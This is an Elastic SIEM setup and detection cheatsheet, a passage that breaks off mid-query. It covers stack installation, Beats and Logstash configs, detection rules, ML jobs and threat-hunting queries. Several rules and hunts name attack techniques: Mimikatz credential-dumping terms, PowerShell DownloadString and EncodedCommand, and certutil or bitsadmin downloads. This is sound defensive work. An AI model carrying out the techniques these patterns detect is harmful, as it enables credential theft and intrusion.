
Elastic SIEM Cheatsheet


Elastic SIEM (Security Information and Event Management) is a security analytics solution built on the Elastic Stack (Elasticsearch, Logstash, Kibana and Beats); in current releases it ships as the Security app (Elastic Security) inside Kibana. It provides real-time threat detection, investigation features and response orchestration for security operations centres, and uses machine learning, behavioral analytics and threat intelligence to detect advanced persistent threats, insider threats and sophisticated attack campaigns across hybrid cloud environments.

Overview

Elastic Stack Architecture

Elastic SIEM is built on the Elastic Stack, which provides a distributed, scalable platform for ingesting, storing, searching and visualizing security data at scale. The architecture consists of several core components that work together to provide security monitoring and analytics.

Elasticsearch is the distributed search and analytics engine that stores and indexes security data from across the enterprise. It provides real-time search, advanced aggregations and machine learning features that enable fast threat detection and investigation. Because it is distributed, organizations can scale their security data lake horizontally to keep up with growing data volumes and user demand.

Logstash is the data processing pipeline that ingests, transforms and enriches security data from many sources before sending it to Elasticsearch. It supports hundreds of input plugins for collecting data from security tools, network devices, cloud platforms and custom applications, and can parse, normalize and enrich data in real time, adding context such as geolocation, threat intelligence and asset information.

Kibana provides the user interface in which security analysts search, visualize and analyze security data. It includes prebuilt dashboards, detection rules, case management and investigation workflows built specifically for security operations; its visualization features let analysts build custom dashboards, run ad-hoc analyses and produce executive reports.

Beats are lightweight data shippers that collect data on endpoints, servers and network devices and forward it to Logstash or Elasticsearch. Security-relevant Beats include Winlogbeat for Windows event logs, Auditbeat for system audit data, Packetbeat for network traffic analysis and Filebeat for log file collection.

Key Features

Core SIEM capabilities:

- Real-time threat detection and alerting
- Advanced behavioral analytics and machine learning
- Threat hunting and investigation workflows
- Case management and incident response
- Timeline analysis and event correlation
- Threat intelligence integration
- Custom detection rule creation
- Executive dashboards and reporting

Installation and Setup

Elasticsearch Installation

```bash
# Download and install Elasticsearch
wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-8.11.0-linux-x86_64.tar.gz
tar -xzf elasticsearch-8.11.0-linux-x86_64.tar.gz
cd elasticsearch-8.11.0

# Configure Elasticsearch for SIEM.
# On a first start with no xpack.security.* settings present, 8.x auto-configures
# TLS and writes its certificates to config/certs; the keystore paths below are
# the ones it creates. If you write these settings before the first start,
# generate the certificates yourself with bin/elasticsearch-certutil, otherwise
# the node refuses to start because the files do not exist.
# network.host: 0.0.0.0 binds to every interface: restrict it to the address
# Kibana and Logstash actually use and firewall 9200/9300 from everything else.
cat > config/elasticsearch.yml << EOF
cluster.name: elastic-siem
node.name: siem-node-1
path.data: /var/lib/elasticsearch
path.logs: /var/log/elasticsearch
network.host: 0.0.0.0
http.port: 9200
discovery.type: single-node

# Security settings
xpack.security.enabled: true
xpack.security.enrollment.enabled: true
xpack.security.http.ssl.enabled: true
xpack.security.http.ssl.keystore.path: certs/http.p12
xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.verification_mode: certificate
xpack.security.transport.ssl.keystore.path: certs/transport.p12
xpack.security.transport.ssl.truststore.path: certs/transport.p12
EOF

# Start Elasticsearch
./bin/elasticsearch

# Set the password of the built-in elastic user.
# elasticsearch-setup-passwords is deprecated in 8.x; reset-password replaces it
# (the first start also prints a generated elastic password).
./bin/elasticsearch-reset-password -u elastic

# Create SIEM-specific index template.
# HTTPS is on, so talk to the node over TLS and trust the generated CA;
# "password" is a placeholder for the value from the previous step.
# number_of_replicas: 1 leaves a single-node cluster yellow; use 0 there.
ES_CA=config/certs/http_ca.crt
curl --cacert "$ES_CA" -X PUT "https://localhost:9200/_index_template/siem-logs" \
  -H "Content-Type: application/json" \
  -u elastic:password \
  -d '{
    "index_patterns": ["siem-*"],
    "template": {
      "settings": {
        "number_of_shards": 3,
        "number_of_replicas": 1,
        "index.lifecycle.name": "siem-policy",
        "index.lifecycle.rollover_alias": "siem-logs"
      },
      "mappings": {
        "properties": {
          "@timestamp": {"type": "date"},
          "event.category": {"type": "keyword"},
          "event.action": {"type": "keyword"},
          "source.ip": {"type": "ip"},
          "destination.ip": {"type": "ip"},
          "user.name": {"type": "keyword"},
          "host.name": {"type": "keyword"},
          "process.name": {"type": "keyword"},
          "file.hash.sha256": {"type": "keyword"}
        }
      }
    }
  }'
```

Kibana Installation and Configuration

```bash
# Download and install Kibana
wget https://artifacts.elastic.co/downloads/kibana/kibana-8.11.0-linux-x86_64.tar.gz
tar -xzf kibana-8.11.0-linux-x86_64.tar.gz
cd kibana-8.11.0

# Configure Kibana for SIEM.
# The heredoc is unquoted on purpose so the $(openssl ...) substitutions run:
# each encryption key must be a distinct random value of at least 32 characters
# (bin/kibana-encryption-keys generate does the same). Reusing one key for all
# three means a single leak exposes saved-object secrets, reports and sessions.
# The Security app is enabled by default in 8.x; the legacy xpack.siem.enabled,
# xpack.securitySolution.enabled and xpack.security.enabled keys no longer exist
# in kibana.yml and cause Kibana to refuse to start.
cat > config/kibana.yml << EOF
server.port: 5601
server.host: "0.0.0.0"
server.name: "elastic-siem-kibana"
elasticsearch.hosts: ["https://localhost:9200"]
elasticsearch.username: "kibana_system"
elasticsearch.password: "kibana_password"
elasticsearch.ssl.certificateAuthorities: ["/path/to/elasticsearch/config/certs/http_ca.crt"]

# SIEM-specific settings
xpack.encryptedSavedObjects.encryptionKey: "$(openssl rand -hex 32)"
xpack.reporting.encryptionKey: "$(openssl rand -hex 32)"
xpack.security.encryptionKey: "$(openssl rand -hex 32)"
EOF

# Start Kibana
./bin/kibana

# Access the Kibana Security (SIEM) interface.
# Without server.ssl.* Kibana listens on plain HTTP; terminate TLS in front of it
# or set server.ssl.enabled before exposing it beyond localhost.
# Navigate to http://localhost:5601/app/security
```

Logstash Configuration for SIEM

```bash
# Install Logstash
wget https://artifacts.elastic.co/downloads/logstash/logstash-8.11.0-linux-x86_64.tar.gz
tar -xzf logstash-8.11.0-linux-x86_64.tar.gz
cd logstash-8.11.0

# Create SIEM pipeline configuration
cat > config/siem-pipeline.conf << 'EOF'
input {
  # Windows Event Logs via Winlogbeat
  beats {
    port => 5044
    type => "winlogbeat"
  }

  # Syslog from network devices. Port 514 needs root or CAP_NET_BIND_SERVICE;
  # an unprivileged Logstash should listen on e.g. 5514 behind a port redirect.
  syslog {
    port => 514
    type => "syslog"
  }

  # CEF logs from security tools
  tcp {
    port => 5140
    codec => cef
    type => "cef"
  }

  # File input for custom logs
  file {
    path => "/var/log/security/*.log"
    start_position => "beginning"
    type => "security_logs"
  }
}

filter {
  # Parse Windows Security events. Winlogbeat 8 already sets event.category,
  # event.action and event.outcome for the Security log; this block shows how
  # to do it by hand for other sources. Two details matter:
  #  - winlog.event_id arrives as a string and Logstash conditionals do not
  #    coerce types, so compare against "4624", not 4624;
  #  - use the nested [event][category] reference. add_field with the dotted
  #    name "event.category" creates a top-level key that literally contains a
  #    dot, which later conditionals and Kibana field lists will not find.
  if [type] == "winlogbeat" {
    if [winlog][event_id] == "4624" {
      mutate {
        add_field => {
          "[event][category]" => "authentication"
          "[event][action]"   => "logon"
          "[event][outcome]"  => "success"
        }
      }
    }

    if [winlog][event_id] == "4625" {
      mutate {
        add_field => {
          "[event][category]" => "authentication"
          "[event][action]"   => "logon"
          "[event][outcome]"  => "failure"
        }
      }
    }

    if [winlog][event_id] == "4688" {
      mutate {
        add_field => {
          "[event][category]" => "process"
          "[event][action]"   => "start"
        }
      }
    }
  }

  # Parse syslog messages. The syslog input already parses the RFC 3164 header;
  # this grok is for lines that arrive unparsed (e.g. through the file input).
  # The optional "[pid]" part needs escaped brackets, or grok reads it as a
  # character class.
  if [type] == "syslog" {
    grok {
      match => {
        "message" => "%{SYSLOGTIMESTAMP:syslog_timestamp} %{IPORHOST:[host][name]} %{WORD:[process][name]}(?:\[%{POSINT:[process][pid]:int}\])?: %{GREEDYDATA:message}"
      }
      overwrite => [ "message" ]
    }

    date {
      match => [ "syslog_timestamp", "MMM  d HH:mm:ss", "MMM dd HH:mm:ss" ]
      remove_field => [ "syslog_timestamp" ]
    }
  }

  # Enrich with GeoIP data. In ECS mode the filter writes [source][geo] and
  # [source][as] itself, so the target is the parent object, not [source][geo].
  if [source][ip] {
    geoip {
      source => "[source][ip]"
      target => "[source]"
    }
  }

  if [destination][ip] {
    geoip {
      source => "[destination][ip]"
      target => "[destination]"
    }
  }

  # Add threat intelligence: look the source address up in a YAML dictionary
  # (ip: indicator type). No fallback value, so only real matches get the field
  # instead of every event carrying threat.indicator.type: unknown.
  translate {
    source => "[source][ip]"
    target => "[threat][indicator][type]"
    dictionary_path => "/etc/logstash/threat_intel.yml"
  }

  # @timestamp is already a timestamp; run date{} only on string fields you
  # parsed yourself, re-parsing @timestamp does nothing useful.
}

output {
  elasticsearch {
    hosts => ["https://localhost:9200"]
    # logstash_writer should be a dedicated role with write/create_index on
    # siem-*, not the elastic superuser
    user => "logstash_writer"
    password => "logstash_password"
    # Verify the server certificate against the CA Elasticsearch generated.
    # Never set ssl_certificate_verification => false: anyone on the path can
    # then impersonate the cluster and capture the credentials above.
    ssl_enabled => true
    ssl_certificate_authorities => ["/path/to/elasticsearch/config/certs/http_ca.crt"]
    index => "siem-logs-%{+YYYY.MM.dd}"
    # The siem-logs index template was created through the API above; stop
    # Logstash from installing its own default template under that name.
    manage_template => false
  }

  # Debug output: remove in production, it copies every event to stdout
  stdout { codec => rubydebug }
}
EOF

# Start Logstash with SIEM pipeline
./bin/logstash -f config/siem-pipeline.conf
```
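The enrichment the Logstash filter above performs, written as an added Python example (not code from the page or from Elastic) so that two pitfalls can be checked on sample data: a literal dotted key such as `"event.category"` is not the nested `[event][category]` object, and `winlog.event_id` must be compared as a string. The `parse_syslog` regex is the Python equivalent of the grok pattern, including the escaped `[pid]` group. All events and log lines are constructed for this example.

```python
"""Added example: ECS normalization as done by the Logstash filter above,
in plain Python. Sample events and log lines are constructed, not real."""
import re
from typing import Any, Optional

# winlog.event_id -> ECS event.* fields, same mapping as the pipeline above
WINDOWS_EVENT_MAP = {
    "4624": {"category": "authentication", "action": "logon", "outcome": "success"},
    "4625": {"category": "authentication", "action": "logon", "outcome": "failure"},
    "4688": {"category": "process", "action": "start"},
}

# Python equivalent of the grok pattern
#   %{SYSLOGTIMESTAMP} %{IPORHOST} %{WORD}(?:\[%{POSINT}\])?: %{GREEDYDATA}
SYSLOG_RE = re.compile(
    r"^(?P<timestamp>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) "
    r"(?P<program>[\w./-]+)(?:\[(?P<pid>\d+)\])?: "
    r"(?P<message>.*)$"
)


def get_nested(doc: dict, path: str, default: Any = None) -> Any:
    """Read doc[a][b] for the dotted path 'a.b'; a literal key 'a.b' is NOT found."""
    cur: Any = doc
    for part in path.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return default
        cur = cur[part]
    return cur


def set_nested(doc: dict, path: str, value: Any) -> None:
    """Write doc[a][b] = value for the dotted path 'a.b', creating objects as needed."""
    parts = path.split(".")
    cur = doc
    for part in parts[:-1]:
        cur = cur.setdefault(part, {})
    cur[parts[-1]] = value


def dedot(doc: dict) -> dict:
    """Rewrite literal dotted keys (what add_field "a.b" creates) into nested objects."""
    out: dict = {}
    for key, value in doc.items():
        if isinstance(value, dict):
            value = dedot(value)
        set_nested(out, key, value)
    return out


def normalize_windows_event(event: dict) -> dict:
    """Add ECS event.* fields for known Security event IDs; returns the event.
    str() makes the lookup work whether event_id arrived as "4624" or 4624."""
    event_id = str(get_nested(event, "winlog.event_id", ""))
    for field, value in WINDOWS_EVENT_MAP.get(event_id, {}).items():
        set_nested(event, f"event.{field}", value)
    return event


def parse_syslog(line: str) -> Optional[dict]:
    """Parse a BSD syslog line into ECS-style host.name / process.name / process.pid."""
    m = SYSLOG_RE.match(line)
    if m is None:
        return None
    doc: dict = {
        "syslog_timestamp": m.group("timestamp"),
        "host": {"name": m.group("host")},
        "process": {"name": m.group("program")},
        "message": m.group("message"),
    }
    if m.group("pid") is not None:
        doc["process"]["pid"] = int(m.group("pid"))
    return doc


# Constructed sample input (not real captures)
SAMPLE_WINLOG = [
    {"winlog": {"event_id": "4625", "event_data": {"TargetUserName": "jdoe", "IpAddress": "10.0.0.5"}}},
    {"winlog": {"event_id": "4688", "event_data": {"NewProcessName": "C:\\Windows\\System32\\cmd.exe"}}},
    {"winlog": {"event_id": "4672", "event_data": {"SubjectUserName": "SYSTEM"}}},
]
SAMPLE_SYSLOG = [
    "Jan  1 00:00:01 fw01 sshd[1234]: Failed password for invalid user admin from 203.0.113.9 port 50000 ssh2",
    "Jan 12 13:14:15 fw01 CRON: (root) CMD (run-parts /etc/cron.hourly)",
]

if __name__ == "__main__":
    for ev in SAMPLE_WINLOG:
        print(normalize_windows_event(dict(ev)).get("event"))
    for line in SAMPLE_SYSLOG:
        print(parse_syslog(line))
    print(dedot({"event.category": "authentication", "winlog": {"event_id": "4624"}}))
```

`get_nested` deliberately fails on the dotted-key document: that is exactly what a Logstash conditional `if [event][category] == "authentication"` would do after an `add_field => { "event.category" => ... }`, and why the pipeline uses the bracket notation.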

Data Collection and Ingestion

Beats Configuration for Security Data

```bash
# Winlogbeat for Windows Event Logs (runs on the Windows host; the file goes
# next to winlogbeat.exe). 4688 only appears once "Audit Process Creation" is
# enabled, and process.command_line only once "Include command line in process
# creation events" is enabled in Group Policy.
cat > winlogbeat.yml << 'EOF'
winlogbeat.event_logs:
  - name: Security
    event_id: 4624, 4625, 4648, 4672, 4688, 4689, 4697, 4698, 4699, 4700, 4701, 4702
  - name: System
    event_id: 7034, 7035, 7036, 7040
  - name: Application
    event_id: 1000, 1001, 1002

output.elasticsearch:
  hosts: ["https://localhost:9200"]
  username: "winlogbeat_writer"
  password: "winlogbeat_password"
  ssl.certificate_authorities: ["/path/to/ca.crt"]
  # Beats 8.x write to the winlogbeat-<version> data stream by default, which
  # the winlogbeat-* patterns used later on this page match. A custom `index:`
  # would also require setup.template.name and setup.template.pattern.

processors:
  - add_host_metadata:
      when.not.contains.tags: forwarded

logging.level: info
logging.to_files: true
logging.files:
  path: C:\ProgramData\winlogbeat\Logs
  name: winlogbeat
  keepfiles: 7
EOF

# Auditbeat for system audit data. The auditd module reads the kernel audit
# socket directly: stop the auditd daemon or set socket_type: multicast so the
# two do not compete for the unicast socket.
cat > auditbeat.yml << 'EOF'
auditbeat.modules:
  - module: auditd
    audit_rule_files: [ '${path.config}/audit.rules.d/*.conf' ]
    audit_rules: |
      # Monitor file access
      -w /etc/passwd -p wa -k identity
      -w /etc/group -p wa -k identity
      -w /etc/shadow -p wa -k identity

      # Monitor privilege escalation: execve as root from a real login session
      # (auid >= 1000 and not the unset value 4294967295)
      -a always,exit -F arch=b64 -S execve -F euid=0 -F auid>=1000 -F auid!=4294967295 -k privilege_escalation

      # Monitor network connections: socket() with AF_INET (a0=2)
      -a always,exit -F arch=b64 -S socket -F a0=2 -k network_connect

      # Monitor file modifications
      -w /bin/ -p wa -k binaries
      -w /sbin/ -p wa -k binaries
      -w /usr/bin/ -p wa -k binaries
      -w /usr/sbin/ -p wa -k binaries

  - module: file_integrity
    paths:
      - /bin
      - /usr/bin
      - /sbin
      - /usr/sbin
      - /etc

  - module: system
    datasets:
      - host
      - login
      - package
      - process
      - socket
      - user
    period: 10s

output.elasticsearch:
  hosts: ["https://localhost:9200"]
  username: "auditbeat_writer"
  password: "auditbeat_password"
  ssl.certificate_authorities: ["/path/to/ca.crt"]
EOF

# Packetbeat for network traffic analysis (needs root or CAP_NET_RAW to sniff)
cat > packetbeat.yml << 'EOF'
packetbeat.interfaces.device: any

packetbeat.flows:
  timeout: 30s
  period: 10s

packetbeat.protocols:
  - type: dns
    ports: [53]
    include_authorities: true
    include_additionals: true
  - type: http
    ports: [80, 8080, 8000, 5000, 8002]
  - type: tls
    ports: [443, 993, 995, 5223, 8443, 8883, 9243]
  - type: ssh
    ports: [22]

output.elasticsearch:
  hosts: ["https://localhost:9200"]
  username: "packetbeat_writer"
  password: "packetbeat_password"
  ssl.certificate_authorities: ["/path/to/ca.crt"]

processors:
  - add_host_metadata: ~
  - add_docker_metadata: ~
  - add_kubernetes_metadata: ~
EOF
```

Custom Log Parsing

```bash
# Create custom parsing rules for security tools. Field references use the
# nested [event][category] form so the values land in ECS objects, not in
# top-level keys that happen to contain a dot.
cat > /etc/logstash/conf.d/security-tools.conf << 'EOF'
filter {
  # Parse Suricata IDS logs (EVE JSON)
  if [type] == "suricata" {
    json {
      source => "message"
    }

    if [event_type] == "alert" {
      mutate {
        add_field => {
          "[event][category]" => "intrusion_detection"
          "[event][action]"   => "alert"
          "[rule][name]"      => "%{[alert][signature]}"
          "[rule][id]"        => "%{[alert][signature_id]}"
        }
      }
    }
  }

  # Parse Zeek/Bro logs ([log_type] is assumed to be set upstream, e.g. by the
  # Filebeat input, to the Zeek log name)
  if [type] == "zeek" {
    if [log_type] == "conn" {
      mutate {
        add_field => {
          "[event][category]" => "network"
          "[event][action]"   => "connection"
        }
      }
    }

    if [log_type] == "dns" {
      mutate {
        add_field => {
          "[event][category]" => "network"
          "[event][action]"   => "dns_query"
        }
      }
    }

    if [log_type] == "http" {
      mutate {
        add_field => {
          "[event][category]" => "network"
          "[event][action]"   => "http_request"
        }
      }
    }
  }

  # Parse OSSEC/Wazuh logs. This grok only splits the line; rule_id has to come
  # from the alert itself (Wazuh's JSON alert output carries it as [rule][id]),
  # otherwise the conditional below never matches.
  if [type] == "ossec" {
    grok {
      match => {
        "message" => "%{TIMESTAMP_ISO8601:timestamp} %{WORD:hostname} %{WORD:component}: %{GREEDYDATA:alert_message}"
      }
    }

    if [rule_id] {
      mutate {
        add_field => {
          "[event][category]" => "host"
          "[event][action]"   => "alert"
          "[rule][id]"        => "%{rule_id}"
        }
      }
    }
  }
}
EOF
```

Detection Rules and Analytics

Example Detection Rules

These are example rule definitions in the shape the Detection Engine API accepts (`type`, `language`, `query` as KQL, optional `threshold`); the same fields are used by the API calls further down.

```json
// Suspicious PowerShell Activity. Wildcards need explicit * characters;
// a bare value such as "Invoke-Expression" is an exact match on the whole
// command line and never fires.
{
  "name": "Suspicious PowerShell Execution",
  "description": "Detects potentially malicious PowerShell commands",
  "severity": "high",
  "risk_score": 75,
  "type": "query",
  "language": "kuery",
  "index": ["winlogbeat-*"],
  "query": "event.category:process and process.name:powershell.exe and process.command_line:(*Invoke-Expression* or *DownloadString* or *EncodedCommand* or *-nop* or *hidden*)",
  "filters": [],
  "timeline_id": "timeline_powershell",
  "timeline_title": "PowerShell Investigation Timeline"
}

// Brute Force Login Attempts: at least 10 failures from one address across at
// least 5 distinct accounts in the rule window (the cardinality clause is what
// separates a password spray from one noisy user)
{
  "name": "Brute Force Login Attempts",
  "description": "Detects multiple failed login attempts from the same source",
  "severity": "medium",
  "risk_score": 50,
  "type": "threshold",
  "language": "kuery",
  "index": ["winlogbeat-*", "auditbeat-*"],
  "query": "event.category:authentication and event.outcome:failure",
  "threshold": {
    "field": ["source.ip"],
    "value": 10,
    "cardinality": [ { "field": "user.name", "value": 5 } ]
  },
  "timeline_id": "timeline_brute_force",
  "timeline_title": "Brute Force Investigation Timeline"
}

// Lateral Movement Detection: one account logging on over the network
// (logon type 3) or RDP (type 10) to 5 or more distinct hosts. Winlogbeat
// keeps the numeric type in winlog.event_data.LogonType; winlog.logon.type
// holds the descriptive name.
{
  "name": "Lateral Movement via Remote Services",
  "description": "Detects potential lateral movement using remote services",
  "severity": "high",
  "risk_score": 80,
  "type": "threshold",
  "language": "kuery",
  "index": ["winlogbeat-*"],
  "query": "event.category:authentication and event.outcome:success and winlog.event_data.LogonType:(3 or 10)",
  "threshold": {
    "field": ["user.name"],
    "value": 1,
    "cardinality": [ { "field": "host.name", "value": 5 } ]
  }
}
```

Machine Learning Jobs

```json
// Anomalous Network Traffic (PUT _ml/anomaly_detectors/anomalous_network_traffic)
{
  "job_id": "anomalous_network_traffic",
  "description": "Detects anomalous network traffic patterns",
  "analysis_config": {
    "bucket_span": "15m",
    "detectors": [
      // count functions take no field_name; unusually large byte volumes per
      // source are a high_sum over network.bytes
      { "function": "high_sum", "field_name": "network.bytes", "by_field_name": "source.ip" },
      // rare has no field_name either: by_field_name is the value whose rarity
      // is scored, partitioned per source address
      { "function": "rare", "by_field_name": "destination.port", "partition_field_name": "source.ip" }
    ],
    "influencers": ["source.ip", "destination.ip", "destination.port"]
  },
  "data_description": {
    "time_field": "@timestamp",
    "time_format": "epoch_ms"
  },
  "datafeed_config": {
    "indices": ["packetbeat-*"],
    "query": { "bool": { "must": [ { "term": { "event.category": "network" } } ] } }
  }
}

// Unusual Process Execution (PUT _ml/anomaly_detectors/unusual_process_execution)
{
  "job_id": "unusual_process_execution",
  "description": "Detects unusual process execution patterns",
  "analysis_config": {
    "bucket_span": "15m",
    "detectors": [
      { "function": "rare", "by_field_name": "process.name", "partition_field_name": "host.name" },
      // freq_rare needs both a by field and an over field; command lines are
      // very high-cardinality, so watch the job's model memory limit
      { "function": "freq_rare", "by_field_name": "process.command_line", "over_field_name": "user.name" }
    ],
    "influencers": ["host.name", "user.name", "process.name"]
  },
  "data_description": {
    "time_field": "@timestamp",
    "time_format": "epoch_ms"
  },
  "datafeed_config": {
    "indices": ["winlogbeat-*", "auditbeat-*"],
    "query": {
      "bool": {
        "must": [
          { "term": { "event.category": "process" } },
          { "term": { "event.action": "start" } }
        ]
      }
    }
  }
}
```

Custom Rules

```bash
# Create custom detection rule via the Kibana Detection Engine API.
# "password" stands for the password of the elastic user, or better of a
# dedicated user holding the SOC-manager privileges.
# Bare tokens such as "sam" or "security" match far too many command lines as
# substrings, so the command-line clause is limited to Mimikatz-specific terms.
curl -X POST "localhost:5601/api/detection_engine/rules" \
  -H "Content-Type: application/json" \
  -H "kbn-xsrf: true" \
  -u elastic:password \
  -d '{
    "name": "Credential Dumping Activity",
    "description": "Detects potential credential dumping tools and techniques",
    "severity": "critical",
    "risk_score": 90,
    "rule_id": "credential-dumping-001",
    "type": "query",
    "language": "kuery",
    "index": ["winlogbeat-*"],
    "query": "event.category:process and (process.name:(mimikatz.exe or procdump.exe or pwdump.exe or fgdump.exe) or process.command_line:(*sekurlsa* or *logonpasswords* or *lsadump*))",
    "filters": [],
    "from": "now-6m",
    "to": "now",
    "interval": "5m",
    "enabled": true,
    "tags": ["credential_access", "T1003"],
    "threat": [
      {
        "framework": "MITRE ATT&CK",
        "tactic": {
          "id": "TA0006",
          "name": "Credential Access",
          "reference": "https://attack.mitre.org/tactics/TA0006/"
        },
        "technique": [
          {
            "id": "T1003",
            "name": "OS Credential Dumping",
            "reference": "https://attack.mitre.org/techniques/T1003/"
          }
        ]
      }
    ]
  }'

# Create threshold-based rule (brute force is ATT&CK T1110, Credential Access)
curl -X POST "localhost:5601/api/detection_engine/rules" \
  -H "Content-Type: application/json" \
  -H "kbn-xsrf: true" \
  -u elastic:password \
  -d '{
    "name": "Multiple Failed SSH Logins",
    "description": "Detects multiple failed SSH login attempts",
    "severity": "medium",
    "risk_score": 60,
    "rule_id": "ssh-brute-force-001",
    "type": "threshold",
    "language": "kuery",
    "index": ["auditbeat-*", "filebeat-*"],
    "query": "event.category:authentication and event.outcome:failure and service.name:ssh",
    "threshold": {
      "field": ["source.ip"],
      "value": 20,
      "cardinality": [ { "field": "user.name", "value": 5 } ]
    },
    "from": "now-5m",
    "to": "now",
    "interval": "5m",
    "enabled": true,
    "tags": ["credential_access", "T1110"]
  }'
```
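An added Python example (not code from the page or from Elastic) of what the threshold rules above actually compute, covering both the "Brute Force Login Attempts" rule and the "Multiple Failed SSH Logins" rule: count events per `source.ip` inside the rule window and, when a cardinality clause is present, also require enough distinct `user.name` values. The events are constructed; they contain one single-account brute force, one password spray and a batch of stale failures outside the lookback.

```python
"""Added example: local emulation of a Kibana threshold rule with a
cardinality clause, over constructed failed-login events."""
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import Any, Callable, Dict, Optional, Tuple

T0 = datetime(2023, 1, 1, 12, 0, tzinfo=timezone.utc)
LOOKBACK_2H = timedelta(hours=2)


def get_nested(doc: dict, path: str, default: Any = None) -> Any:
    """Read doc[a][b] for the dotted ECS field name 'a.b'."""
    cur: Any = doc
    for part in path.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return default
        cur = cur[part]
    return cur


def is_failed_auth(event: dict) -> bool:
    """The rule's KQL: event.category:authentication and event.outcome:failure."""
    return (get_nested(event, "event.category") == "authentication"
            and get_nested(event, "event.outcome") == "failure")


def threshold_rule(
    events: list,
    *,
    group_field: str,
    count_value: int,
    cardinality_field: Optional[str] = None,
    cardinality_value: int = 0,
    window: timedelta = timedelta(minutes=5),
    query: Callable[[dict], bool] = is_failed_auth,
    now: Optional[datetime] = None,
) -> Dict[str, Tuple[int, int]]:
    """Emulate one execution of a threshold rule.

    Returns {group_value: (doc_count, distinct_cardinality_values)} for every
    group whose count >= count_value and, if a cardinality field is given,
    whose distinct values >= cardinality_value. `now` defaults to the newest
    event so the samples are judged as if the rule ran then ("from": "now-5m").
    """
    now = now or max(e["@timestamp"] for e in events)
    start = now - window
    counts: Dict[str, int] = defaultdict(int)
    distinct: Dict[str, set] = defaultdict(set)
    for event in events:
        if not (start <= event["@timestamp"] <= now) or not query(event):
            continue
        group = get_nested(event, group_field)
        counts[group] += 1
        if cardinality_field:
            distinct[group].add(get_nested(event, cardinality_field))
    hits: Dict[str, Tuple[int, int]] = {}
    for group, count in counts.items():
        if count < count_value:
            continue
        if cardinality_field and len(distinct[group]) < cardinality_value:
            continue
        hits[group] = (count, len(distinct[group]))
    return hits


def failed_login(seconds: int, ip: str, user: str) -> dict:
    """Constructed ECS-style failed SSH logon event at T0 + seconds."""
    return {
        "@timestamp": T0 + timedelta(seconds=seconds),
        "event": {"category": "authentication", "outcome": "failure"},
        "source": {"ip": ip},
        "user": {"name": user},
        "service": {"name": "ssh"},
    }


SAMPLE_EVENTS = (
    # 25 failures from one address against one account: classic brute force
    [failed_login(i, "198.51.100.7", "admin") for i in range(25)]
    # 1 failure against each of 30 accounts from a second address: password spray
    + [failed_login(i, "203.0.113.9", f"user{i:02d}") for i in range(30)]
    # 40 failures an hour earlier, outside the 5-minute lookback
    + [failed_login(-3600 + i, "192.0.2.4", "svc") for i in range(40)]
)

if __name__ == "__main__":
    print("count only       :", threshold_rule(SAMPLE_EVENTS, group_field="source.ip", count_value=20))
    print("count+cardinality:", threshold_rule(SAMPLE_EVENTS, group_field="source.ip", count_value=20,
                                               cardinality_field="user.name", cardinality_value=5))
    print("per user         :", threshold_rule(SAMPLE_EVENTS, group_field="user.name", count_value=20))
```

Three runs tell the story: counting per `source.ip` alone flags both attackers, adding the `user.name` cardinality keeps only the spray, and grouping by `user.name` instead sees the brute-forced `admin` account but never the spray, because each sprayed account fails only once.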

Investigation and Threat Hunting

Timeline Analysis

```bash
# Create investigation timeline
curl -X POST "localhost:5601/api/timeline" \
  -H "Content-Type: application/json" \
  -H "kbn-xsrf: true" \
  -u elastic:password \
  -d '{
    "timeline": {
      "title": "Incident Investigation Timeline",
      "description": "Timeline for investigating security incident",
      "timelineType": "default",
      "templateTimelineId": null,
      "templateTimelineVersion": null,
      "dataProviders": [
        {
          "id": "host-investigation",
          "name": "Host Investigation",
          "enabled": true,
          "excluded": false,
          "kqlQuery": "",
          "queryMatch": { "field": "host.name", "value": "suspicious-host", "operator": ":" }
        }
      ],
      "kqlQuery": {
        "filterQuery": { "kuery": { "kind": "kuery", "expression": "host.name: suspicious-host" } }
      },
      "dateRange": { "start": "2023-01-01T00:00:00.000Z", "end": "2023-01-02T00:00:00.000Z" }
    }
  }'

# Query timeline events
curl -X POST "localhost:5601/api/timeline/search" \
  -H "Content-Type: application/json" \
  -H "kbn-xsrf: true" \
  -u elastic:password \
  -d '{
    "defaultIndex": ["winlogbeat-*", "auditbeat-*", "packetbeat-*"],
    "timerange": { "from": "2023-01-01T00:00:00.000Z", "to": "2023-01-02T00:00:00.000Z", "interval": "12h" },
    "filterQuery": { "bool": { "must": [ { "term": { "host.name": "suspicious-host" } } ] } },
    "pagination": { "activePage": 0, "querySize": 25 },
    "sort": { "columnId": "@timestamp", "sortDirection": "desc" }
  }'
```

Threat Hunting Queries

Kibana Dev Tools console syntax:

```
# Hunt for living off the land techniques. Wildcard patterns need the *
# characters; a wildcard query without them is just an exact match.
GET /winlogbeat-*/_search
{
  "query": {
    "bool": {
      "must": [
        { "term": { "event.category": "process" } },
        { "terms": { "process.name": [ "certutil.exe", "bitsadmin.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe", "wmic.exe" ] } },
        {
          "bool": {
            "should": [
              { "wildcard": { "process.command_line": { "value": "*http*", "case_insensitive": true } } },
              { "wildcard": { "process.command_line": { "value": "*download*", "case_insensitive": true } } },
              { "wildcard": { "process.command_line": { "value": "*urlcache*", "case_insensitive": true } } }
            ],
            "minimum_should_match": 1
          }
        }
      ]
    }
  },
  "aggs": {
    "by_host": {
      "terms": { "field": "host.name", "size": 10 },
      "aggs": { "by_process": { "terms": { "field": "process.name", "size": 10 } } }
    }
  }
}

# Hunt for persistence mechanisms. registry.path and file.path hold full paths,
# so the key fragments are matched with wildcards (a terms query needs the exact
# value). Scheduled tasks under \Microsoft\ are created by Windows itself, so
# they are excluded rather than required. Backslashes are escaped once for JSON
# and once for the wildcard syntax.
GET /winlogbeat-*/_search
{
  "query": {
    "bool": {
      "should": [
        {
          "bool": {
            "must": [ { "term": { "winlog.event_id": "4698" } } ],
            "must_not": [ { "wildcard": { "winlog.event_data.TaskName": { "value": "\\\\Microsoft\\\\*", "case_insensitive": true } } } ]
          }
        },
        {
          "bool": {
            "must": [ { "term": { "event.category": "registry" } } ],
            "filter": {
              "bool": {
                "should": [
                  { "wildcard": { "registry.path": { "value": "*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*", "case_insensitive": true } } },
